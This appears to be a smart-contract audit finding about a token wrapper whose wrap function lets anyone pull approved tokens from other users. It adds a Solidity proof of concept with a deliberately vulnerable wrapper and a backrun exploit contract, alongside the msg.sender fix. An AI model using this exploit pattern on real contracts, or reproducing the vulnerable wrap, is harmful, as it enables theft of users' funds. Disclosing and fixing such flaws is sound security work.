Handle
pauliax
Vulnerability details
Impact
The function wrap can be called by anyone. It accepts arbitrary _from and _to addresses, transfers the underlying tokens from _from, and mints the wrapped tokens to _to. A malicious actor can therefore pull tokens from any user who has previously approved the contract. For example, an EOA user needs to execute 2 txs, first approve and then wrap, so an attacker can monitor the mempool and backrun the approval tx with a wrap call that names the victim as _from and the attacker as _to. Also, it is common practice to approve larger (or even unlimited) amounts, so such users stay exposed even after their own wrap call: whatever allowance is left over can be drained at any time.
Recommended Mitigation Steps
A simple solution would be to remove the _from parameter and use msg.sender instead, so that a caller can only ever spend tokens they approved themselves.
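The following is an added illustration, not code from the audited project: a hypothetical wrapper with the vulnerable wrap(_from, _to, _amount) signature next to the hardened version that takes the funds from msg.sender, plus a minimal mock ERC-20 and a scenario contract that replays the backrun. The contract and function names, the mock token and the amounts are all assumptions made for this example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal ERC-20 surface the wrapper needs (assumed; not the project's interface).
interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Hypothetical mock token so the scenario is self-contained and deployable.
contract MockERC20 is IERC20 {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        return true;
    }

    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        // Standard ERC-20 semantics: the spender's allowance is checked, the caller's identity is not.
        require(allowance[from][msg.sender] >= amount, "insufficient allowance");
        require(balanceOf[from] >= amount, "insufficient balance");
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// VULNERABLE: mirrors the pattern described in the finding (hypothetical contract).
contract VulnerableWrapper {
    IERC20 public immutable underlying;
    mapping(address => uint256) public balanceOf; // wrapped balances

    constructor(IERC20 _underlying) { underlying = _underlying; }

    // Anyone may name any `_from` that has approved this contract and any `_to` of their choosing.
    function wrap(address _from, address _to, uint256 _amount) external {
        require(underlying.transferFrom(_from, address(this), _amount), "transfer failed");
        balanceOf[_to] += _amount;
    }
}

// HARDENED: the source of funds is always msg.sender, as the mitigation recommends.
contract HardenedWrapper {
    IERC20 public immutable underlying;
    mapping(address => uint256) public balanceOf;

    constructor(IERC20 _underlying) { underlying = _underlying; }

    // `_to` may stay: the caller only ever spends tokens they approved themselves,
    // so minting to a different recipient costs nobody else anything.
    function wrap(address _to, uint256 _amount) external {
        require(underlying.transferFrom(msg.sender, address(this), _amount), "transfer failed");
        balanceOf[_to] += _amount;
    }
}

// Replays the backrun described in the finding against the vulnerable wrapper.
contract BackrunScenario {
    MockERC20 public token = new MockERC20();
    VulnerableWrapper public wrapper = new VulnerableWrapper(token);

    // `victim` is any account that has just sent `approve(wrapper, allowance)`; this contract
    // plays the attacker who saw that tx in the mempool and submits wrap right behind it.
    function exploit(address victim, uint256 allowance) external returns (uint256 stolen) {
        // Attacker-controlled call: victim's tokens leave, wrapped tokens are minted to the attacker.
        wrapper.wrap(victim, msg.sender, allowance);
        stolen = wrapper.balanceOf(msg.sender);
        // With HardenedWrapper the equivalent call would pull from msg.sender (the attacker),
        // who has approved nothing, so transferFrom reverts and the victim is untouched.
    }
}
```

To reproduce in a sandbox: deploy BackrunScenario, mint tokens to a victim account via scenario.token(), have the victim call approve(address(scenario.wrapper()), amount), then call exploit(victim, amount) from a third account. The wrapped balance lands with the third account even though the victim never called wrap; the same sequence against HardenedWrapper fails at the allowance check.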